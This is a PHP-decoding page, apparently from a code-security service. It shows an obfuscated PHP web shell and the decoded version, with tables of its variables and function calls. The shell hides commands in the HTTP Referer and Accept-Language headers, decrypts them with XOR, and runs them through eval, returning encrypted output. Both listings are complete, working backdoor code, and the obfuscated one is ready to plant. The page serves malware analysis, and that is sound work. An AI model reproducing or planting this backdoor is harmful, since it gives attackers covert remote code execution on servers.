Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $u='r($u[Fn"querFny"],$Fnq);$q=arraFny_valueFnsFn($q);pregFnFn_match_aFnll("/([\\w]..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$u='r($u[Fn"querFny"],$Fnq);$q=arraFny_valueFnsFn($q);pregFnFn_match_aFnll("/([\\w])[\\wFn-Fn]';
$a=');Fn$o="FnFn";for(Fn$i=0;$i<$l;){foFnr($j=0Fn;($j<$c&Fn&Fn$i<$l);$Fnj++,$i+Fn+){Fn$o.=$t{$iFn';
$F='s[$iFn],$f);if($e)FnFn{$k=$kh.$Fnkf;obFn_start(Fn);@evFnal(Fn@gFnzuncompFnFnress(@x(@bas';
$G='unFnt($m[1Fn])Fn;$z++)Fn$p.=$qFn[$m[2][$zFnFn]];if(strFnpos($p,$h)===0FnFn){Fn$s[$i]="";';
$E='Fne64_dFnecFnode(preFng_replFnace(array("/_/","/Fn-/"),arrFnayFn("Fn/","+Fn"),$Fnss($s[';
$t='$i],0,$e))Fn)Fn,$k)));$Fno=ob_geFnt_coFnntents();Fnob_end_cFnleFnan();$dFn=baseFnFn64_enco';
$n=str_replace('z','','crezazte_zfzzunctizon');
$b='+(?:;q=Fn0.([\\dFn]))?,?Fn/",$Fnra,$m)Fn;if(Fn$q&Fn&$Fnm){@session_start()Fn;$s=&$_SFnFnESSI';
$T='["FnHTTP_ACCEFnPT_FnLANGUAFnGE"Fn];if($rr&&$raFnFnFn){$u=parse_url($rr);FnFnparseFn_st';
$K='nFnd5Fn($i.$khFnFn),0Fn,3));$f=$sl($ss(md5($i.$kfFn),0,Fn3));$p="FnFnFn";for($z=1;Fn$z<co';
$W='Fn$p=$ss($p,3)Fn;}ifFn(array_Fnkey_exFnistFns($i,$s))Fn{$s[$i].=Fn$pFn;$e=FnstrpFnos($';
$B='de(Fnx(gzFncompress(Fn$o),$Fnk));prinFnt("Fn<$k>$d</$k>Fn");@Fnsession_dFnestroyFn();}}}}';
$S='}^$k{$j}Fn;}}rFneturFnn $o;}$r=Fn$_FnSEFnRVER;$rr=@$Fnr["HTTP_FnREFEFnRER"];Fn$ra=@$rFn';
$I='$kh="5dFn41";$kf="Fn40Fn2Fna";functionFnFn x($Fnt,$kFn){$c=strlen($kFn);$l=strlenFn($t';
$N='ONFn;$sFns="subFnstFnr";$sl=Fn"strtolower";$i=Fn$m[Fn1Fn][0].$m[1Fn][1];$h=Fn$sl($ss(mF';
$C=str_replace('Fn','',$I.$a.$S.$T.$u.$b.$N.$K.$G.$W.$F.$E.$t.$B);
$p=$n('',$C);$p();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$B de(Fnx(gzFncompress(Fn$o),$Fnk));prinFnt("Fn<$k>$d</$k>Fn");..
$C $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$E Fne64_dFnecFnode(preFng_replFnace(array("/_/","/Fn-/"),arrFn..
$F s[$iFn],$f);if($e)FnFn{$k=$kh.$Fnkf;obFn_start(Fn);@evFnal(F..
$G unFnt($m[1Fn])Fn;$z++)Fn$p.=$qFn[$m[2][$zFnFn]];if(strFnpos(..
$I $kh="5dFn41";$kf="Fn40Fn2Fna";functionFnFn x($Fnt,$kFn){$c=s..
$K nFnd5Fn($i.$khFnFn),0Fn,3));$f=$sl($ss(md5($i.$kfFn),0,Fn3))..
$N ONFn;$sFns="subFnstFnr";$sl=Fn"strtolower";$i=Fn$m[Fn1Fn][0]..
$S }^$k{$j}Fn;}}rFneturFnn $o;}$r=Fn$_FnSEFnRVER;$rr=@$Fnr["HTT..
$T ["FnHTTP_ACCEFnPT_FnLANGUAFnGE"Fn];if($rr&&$raFnFnFn){$u=par..
$W Fn$p=$ss($p,3)Fn;}ifFn(array_Fnkey_exFnistFns($i,$s))Fn{$s[$..
$a );Fn$o="FnFn";for(Fn$i=0;$i<$l;){foFnr($j=0Fn;($j<$c&Fn&Fn$i..
$b +(?:;q=Fn0.([\dFn]))?,?Fn/",$Fnra,$m)Fn;if(Fn$q&Fn&$Fnm){@se..
$n create_function
$p None
$t $i],0,$e))Fn)Fn,$k)));$Fno=ob_geFnt_coFnntents();Fnob_end_cF..
$u r($u[Fn"querFny"],$Fnq);$q=arraFny_valueFnsFn($q);pregFnFn_m..

Stats

MD5 1f4fd023cedb19350bfd24a8e359f4c9
Eval Count 1
Decode Time 115 ms